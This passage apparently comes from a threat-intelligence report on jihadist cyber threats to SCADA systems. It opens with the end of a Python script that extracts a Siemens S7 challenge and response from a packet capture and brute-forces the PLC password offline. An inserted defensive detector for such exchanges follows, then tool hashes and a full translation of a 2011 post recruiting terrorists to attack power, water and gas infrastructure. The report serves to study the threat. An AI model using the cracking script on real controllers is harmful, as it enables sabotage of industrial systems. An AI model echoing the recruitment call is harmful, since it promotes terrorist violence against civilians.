        _t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])
        for pckt_indx in sorted(_t1.keys()):
            pckt_len = _t1[pckt_indx]
            if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831':
                pckt_141 = pckt_indx
                break

        # try to find auth result packet
        pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok
        pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad
        for pckt_indx in sorted(_t1.keys()):
            pckt_len = _t1[pckt_indx]
            if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32':
                pckt_84 = pckt_indx
                break
            if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732':
                pckt_92 = pckt_indx
                break

        print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)
        if pckt_84:
            print "auth ok"
        else:
            print "auth bad. for brute we need right auth result. exit"
            sys.exit()

        challenge = None
        response = None

        raw_challenge = hexlify(r[pckt_108].load)
        if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':
            challenge = raw_challenge[52:92]
            print "found challenge: %s" % challenge
        else:
            print "cannot find challenge. exit"
            sys.exit()

        raw_response = hexlify(r[pckt_141].load)
        if raw_response[64:70] == '100214' and raw_response[110:112] == '00':
            response = raw_response[70:110]
            print "found response: %s" % response
        else:
            print "cannot find response. exit"
            sys.exit()

        return challenge, response

    def calculate_s7response(password, challenge):
        challenge = challenge.decode("hex")
        return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest()

    if __name__ == '__main__':
        print "using pcap file: %s" % cfg_pcap_file
        challenge, response = get_challenge_response()
        print "start password bruteforsing ..."
        for p in open(cfg_dictionary_file):
            p = p.strip()
            if response == calculate_s7response(p, challenge):
                print "found password: %s" % p
                sys.exit()
        print "password not found. try another dictionary."
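A defender's counterpart to the script above, added here as an example (it is not part of the SenseCy report or of the tool): the script only works on a capture that holds a challenge, a response and an "auth ok" answer, so the same frame sizes and payload markers can tell a monitoring team which sessions exposed that material on the wire and which clients are accumulating "auth bad" answers. The `Frame` record, the function names, the thresholds and the sample addresses are hypothetical, and treating the script's markers as stable across firmware versions is an assumption.

```python
from binascii import hexlify
from collections import defaultdict, namedtuple

# (frame size, payload marker) pairs exactly as matched by the Appendix 1 script.
# Assumption: they identify the S7 auth stages in the monitored environment too.
S7_AUTH_MARKERS = {
    (108, "7202002732"): "challenge",  # PLC -> client
    (141, "7202004831"): "response",   # client -> PLC
    (84, "7202000f32"): "auth_ok",     # PLC -> client
    (92, "7202001732"): "auth_bad",    # PLC -> client
}

# Hypothetical record a sensor would emit: time, endpoints, size, TCP payload.
Frame = namedtuple("Frame", "ts src dst frame_len payload")


def classify(frame):
    """Return the auth stage for a frame, or None if it is not one."""
    marker = hexlify(frame.payload)[14:24].decode()  # same slice as the script
    return S7_AUTH_MARKERS.get((frame.frame_len, marker))


def analyze(frames, max_failures=3, window=60.0):
    """Report exposed exchanges and clients with repeated failed logins."""
    pending = {}                  # (client, plc) -> stages seen so far
    failures = defaultdict(list)  # (client, plc) -> timestamps of auth_bad
    exposed = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        kind = classify(f)
        if kind is None:
            continue
        # Only the response travels client -> PLC; the rest is PLC -> client.
        pair = (f.src, f.dst) if kind == "response" else (f.dst, f.src)
        if kind == "challenge":
            pending[pair] = {"challenge"}
        elif kind == "response":
            if "challenge" in pending.get(pair, ()):
                pending[pair].add("response")
        else:
            complete = pending.pop(pair, set()) == {"challenge", "response"}
            if kind == "auth_ok" and complete and pair not in exposed:
                # Challenge + response + success were all observable:
                # password strength is the only barrier to offline guessing.
                exposed.append(pair)
            elif kind == "auth_bad":
                failures[pair].append(f.ts)
    guessing = []
    for pair, stamps in failures.items():
        # Largest number of failures that fall inside one sliding window.
        worst = max(sum(1 for t in stamps if 0 <= t - start <= window)
                    for start in stamps)
        if worst >= max_failures:
            guessing.append(pair + (worst,))
    return {"exposed": exposed, "guessing": sorted(guessing)}


def _frame(ts, src, dst, frame_len, marker):
    """Constructed frame: 7 filler bytes, the marker, then zero padding."""
    body = bytes(7) + bytes.fromhex(marker)
    return Frame(ts, src, dst, frame_len, body.ljust(frame_len - 54, b"\x00"))


# Constructed sample traffic (not taken from any real capture).
PLC, ENG, ODD = "10.0.0.20", "10.0.0.5", "10.0.0.66"
SAMPLE_FRAMES = [
    _frame(1.0, PLC, ENG, 108, "7202002732"),
    _frame(1.1, ENG, PLC, 141, "7202004831"),
    _frame(1.2, PLC, ENG, 84, "7202000f32"),
    _frame(2.0, PLC, ENG, 108, "7202001f32"),  # right size, other marker
]
for i in range(4):  # four failed logins from one host, five seconds apart
    t = 10.0 + 5 * i
    SAMPLE_FRAMES += [
        _frame(t, PLC, ODD, 108, "7202002732"),
        _frame(t + 0.1, ODD, PLC, 141, "7202004831"),
        _frame(t + 0.2, PLC, ODD, 92, "7202001732"),
    ]

if __name__ == "__main__":
    print(analyze(SAMPLE_FRAMES))
```

An entry under `exposed` is a prompt to review the password strength and network segmentation of that PLC, since offline guessing against a captured exchange produces no further traffic to detect.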

    Appendix 2: Technical Indicators for the SCADA-Related Tools

    Brute-Force Tool for S-7

    Tool Type: Brute-force

    Tool Size: 3.3 KB

    MD5: ea2ce25bed88468509f75801a03ad4a7

    ScadaScan

    Tool Type: Scanner, brute-force

    Tool Size: 3,908 bytes

    MD5: ac0ebc8b18b98639a1b1d8531db17cb2

    PLCScan

    Tool Type: Scanning tool

    Tool Size: 3,093 bytes

    MD5: be7d53a8992ba11aa715b2c9b664054f

    Appendix 3: Full Translation of Yaman Mukhaddab's Message

    Honestly speaking: we need male and female terrorists to start a new al-Qaeda base. This is

    serious, so we wish for everyone to view it

    In the Name of Allah, the Most Compassionate and Merciful

    []

    Without any unnecessary introductions: it is not a joke! We need male and female terrorists, in

    order to start a new al-Qaeda base which can only be started after we make sure we have the

    necessary number of personnel.

    Later on we will present the tasks and objectives of this base, followed by the general requirements

    of the terrorists, followed by the categories of expertise required of the terrorists needed.

    Whoever reads this thread and wants to volunteer must meet just two requirements:

    Absolutely consent to the general requirements.

    Choose the field fitting one's capabilities, without the slightest exaggeration. In case of any doubt, it is better if one underestimates one's capabilities, since an overestimation may be disastrous, resulting in the failure of great operations and a fellow member's efforts.

    Whoever cannot meet the general requirements, or finds no field fitting his capabilities, I kindly ask

    him to only pray for his fellows, taking no part in this project, no matter how enthusiastic he may be

    about it. He may have many other ways to support jihad and jihadists. This is to make this thread

    focused and easy to check, and to allow the advance to the next stage, by Allah's will.

    I ask whoever reads the thread not to be amazed at or complain about the public manner in which

    we decided to make this address, and not advise us to keep it secret. If secrecy was of any use, we

    would not have resorted to publicity. We need, first of all, to make sure we have the necessary

    number of male and female volunteer terrorists meeting the requirements, and this can only be

    done publicly.

    Likewise, to anyone arguing that some of these volunteers may be enemy agents, I say: certainly,

    this is quite expected. But do not worry, since they will be eventually uncovered and suffer

    unexpected blows. This may be another advantage of this project and the new terrorist base.

    1. The new terrorist base's tasks and priorities:

    Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel powers, specifically the U.S., the U.K. and France, no others. This base is not to attack, for instance, the sites of Shia, Christians, apostates, slanderers, liars' sites and forums, or anything else. I repeat: it will only target the U.S., U.K. and France.

    These are the targets of the future attacks, in order of priority:

    SCADA systems, in order to destroy power, water and gas supply lines, airports, railway

    stations, underground train stations, as well as central command and control systems in

    these three infidel countries, in the aforementioned order.

    Control systems of general financial sites, such as central saving organizations, stock

    markets, and major banks.

    Sites and databases of major corporations controlling the infidel countries' economy.

    Public sites affecting the citizens' daily routine, in order to maximize the terror effects on the population.

    2. The general requirements of the male and female volunteer terrorists:

    Wholehearted devotion to Allah, reliance on Him, and absolute conviction that one's actions are a fight for Allah's Cause. One must never have the slightest doubt of the Islamic legitimacy of it, and believe this is one's personal duty, if he is capable of it.

    Keeping it secret, without ever mentioning it, not even to one's closest relatives, such as spouse, household, children, or parents. One should never boast of his capability, despite any provocations or accusations, or even if this matter is discussed in one's presence.

    Making time for practicing this project, and not being diverted by anything else. In case it

    interferes with other occupations, electronic Jihad should have priority, and one should vow

    this to God.

    Keeping one's promise and pledge, without any slackening, under any excuse whatsoever. Whoever suspects that certain matters may prevent him from doing so, he should not volunteer, since he has thousands of other ways to support Jihad and Jihadists, and Allah will reward him.

    Once a target and a tactic are selected, one may never withdraw or oppose it, or express other views, just get to work resolutely and forcefully, immediately carrying out any assignment, following all details and manner of operation, at all cost. Since he is in the battlefield, any retreat or slackening is just like turning his back in a day of attack.

    Finally, one must have a totally unlimited and unrestricted access to a computer with an

    Internet connection.

    3. The categories and fields of capabilities required of the terrorists:

    Everyone accepting the general requirements, and wants to volunteer, should choose at least one of the following categories which totally fit one's capabilities, without the slightest overestimation of one's capabilities. In case of any doubt, let one choose the lesser capability. Please notice that any higher-level category does not necessarily contain all the lower-level categories.

    A proper understanding of how to hack SCADA systems.

    A proper understanding of SCADA systems, without knowledge of hacking methods.

    Acquaintance with writing hacking programs and scripts using lower-level languages such as Machine language or Assemply language [misspelling is in the original-TG]

    Absolute mastering of programming in C, C+ and C++ languages.

    A highly professional acquaintance with high-level Object Oriented programming languages.

    Expertise in networks, communication protocols, and various kinds of routers and firewalls,

    especially CISCO.

    Expertise in Linux or Unix operating systems, or both systems, and capability of easily

    operating as a system manager for a server operated by these systems.

    Expertise in Windows operating system and can easily serve as a system manager for one of the servers operated by these systems.

    Expertise in information-security systems.

    Proper acquaintance with testing programs and operating systems, and capability of

    detecting their security vulnerabilities.

    A proper understanding of the meaning of hacking and how to use the tools and software

    for detecting the vulnerabilities of sites such as using the available tools for hacking, but with

    no capability of making such tools.

    A proper understanding of the meaning of hacking and how it is done, but lack of knowledge

    on ways to obtain available tools, software or scripts to check a site he plans to hack. But, if

    the necessary tools are obtained, he has the capability of hacking, unaided, a website with

    any vulnerability.

    A proper understanding of the meaning of hacking and how it is done, but lack of knowledge

    on how to use the necessary tools without an explanation from another person.

    A proper acquaintance with hackers' websites, capability of entering them easily, searching for required scripts, tools, or software, and providing them to one's fellows, if asked for it.

    A proper understanding of the communication protocols TCP/IP on the internet, including

    the seven layers of the protocol and the way they interact, as well as subsequent services

    such as DHCP and DNS. In addition, he needs to be acquainted with the IP, but with no

    experience in hacking.

    Complete mastering of English or French scientific language and scientific background in

    computer engineering. Capability of self-learning under the proper guidance from

    publications in one of these languages, but with none of the aforementioned capabilities.

    Mastering of Russian language.

    Mastering of Chinese language.

    None of the aforementioned categories, but full, fearless, undeterred readiness, to operate on his PC a program provided by the terrorist base, letting it operate according to future orders, following them precisely, with no fear from the consequences of the program's operation. The program's MO shall be explained to such an operative, if he is ready to trust it without any doubts, and operate it following the instructions precisely.

    Now, those male and female terrorists who wish to volunteer should post a response in this thread,

    made of two parts, even using the copy-paste option:

    I swear to Allah that I fully accept the general conditions, and fully meet the general

    requirements. I swear, before Allah, to comply with everything.

    I fit into the following category or categories. Now copy-paste what fits your capabilities, if

    you find any.

    May Allah bless all our dear supporters.

    I remind everybody unwilling or unable to participate to settle for praying for his fellows.

    I also remind all male and female terrorists who wish to volunteer, they must follow this thread's contents precisely, in order to make it meet its objectives, by the will of Osama's and Ayman's Lord.

    Allah masters our intentions and guides our way,

    Brother Yaman Mukhaddab,

    10th of Rajab 1432 AH, 11th of June 2011

    Disclaimer and Limitation of Liability

    Copyright and License of Product

    This report (the Product) is the property of Terrogence Ltd. and is protected by Israel and international copyright law and conventions.

    User acknowledges that access to the Product is limited to the License terms set forth herein and any expansion must be in writing. The

    granting of the License to access and use the Product is conditioned on User's agreement not to disclose, copy, disseminate, redistribute,

    or publish the Product, or any portion of or excerpts thereof to any other party.

    User shall have the right to use the Product solely for its own internal information purposes. Reproduction of the Product in any form or by

    any means is forbidden without Terrogence's written permission.

    User agrees to maintain all copyright, trademark and other notices contained in the Product. User agrees that it shall not use Terrogence's

    name or any excerpts from the Product in the promotion of its products or services.

    Disclaimer of Warranties

    Terrogence does not make any warranties, express or implied, including, without limitation, those of merchantability and fitness for a

    particular purpose, with respect to the Product. Although Terrogence takes reasonable steps to screen the Product for infection by viruses,

    worms, Trojan horses or other code manifesting contaminating or destructive properties before making the Product available, Terrogence

    cannot guarantee that the Product will be free of infection. Terrogence does not make any warranties, express or implied, of whatsoever

    nature with respect to the Product or to the accuracy of any conclusions set out in the Product.

    Accuracy of Information

    The information contained in the Product has been obtained from sources believed to be reliable and are provided by Terrogence on an

    "as is" basis. To the full extent permissible by applicable law, Terrogence disclaims all warranties, express or implied, of whatsoever nature

    including, but not limited to any warranties as to the accuracy, completeness, quality or adequacy of any such information, any

    conclusions set out in the Product and any translations in the Product. The reader assumes sole responsibility for the selection of the

    Product to achieve its intended results. The opinions expressed in the Product are subject to change at any time without notice.

    Limitation of Liability

    To the extent permitted under applicable law, in no event will Terrogence be liable in any way for:

    1. damages of any kind, including without limitation, direct, incidental punitive, special or consequential damages (including, but

    not limited to, damages for lost profits, business interruption and loss of programs or information) arising out of the use of or

    inability to use the Product, or any information provided in the Product, regardless of whether or not Terrogence has been

    advised of the possibility of such damages;

    2. any claim attributable to errors, omissions or other inaccuracies in the Product or interpretations thereof; and

    3. actions taken or not taken by any person or entity as a result of the review by such person or entity of the Product or

    information contained therein or as a result of the interpretation of the Product or information contained therein by such

    person or entity.

    Indemnification

    User agrees to indemnify, defend and hold harmless Terrogence, its affiliates, licensors, and their respective officers, directors, employees

    and agents from and against all losses, expenses, damages and costs, including reasonable attorneys' fees, arising out of the use of the

    Product by User or User's account.

    Third Party Rights

    The provisions regarding Disclaimer of Warranty, Limitation of Liability and Indemnification are for the benefit of Terrogence, and its

    licensors, employees and agents. Each shall have the right to assert and enforce those provisions against a User.

    General Provisions

    Any provision in any memorandum received by Terrogence in connection with the Product which is inconsistent with, or adds to, the

    provisions of this Agreement is void. Neither the parties' course of conduct nor trade practice will modify the terms of this Agreement. If

    any provision of this Agreement is determined by a court of competent jurisdiction to be invalid, all other terms and conditions shall

    remain in full force and effect.

    Governing Law

    This Agreement and the resolution of any dispute arising hereunder shall all be governed and construed in accordance with the laws of the

    state of Israel, without regard to its conflicts of law principles. User consents to the jurisdiction of the courts of Tel-Aviv.